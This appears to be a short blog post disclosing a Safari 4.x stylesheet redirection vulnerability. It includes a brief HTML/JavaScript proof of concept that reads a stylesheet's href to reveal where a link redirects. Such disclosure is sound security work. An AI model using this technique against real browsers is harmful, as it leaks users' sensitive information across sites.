Home > Exploits, OS X > Apple Safari Stylesheet Redirection vulnerability

Apple Safari Stylesheet Redirection vulnerability

There’s a 0-day vulnerability affecting Safari 4.x users, it’s not critical, but it is important to be aware of it.

<link rel="stylesheet" type="text/css" href="www.yahoo.com">
<script language="javascript">
setTimeout("alert(document.styleSheets[0].href)", 10000);
//setTimeout is used just to wait for page loading

Listing 01 – Apple Safari Stylesheet Redirection PoC

Cesar Cerrudo has discovered this vulnerability, and discussed that Safari wasn’t able to display the LINK specified in href value, instead it reads the stylesheets to redirect to a target URL.

Malicious user may take advantage of this vulnerability to steal sensitive information.

Be cautious when surfing the net!

  1. No comments yet.
  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: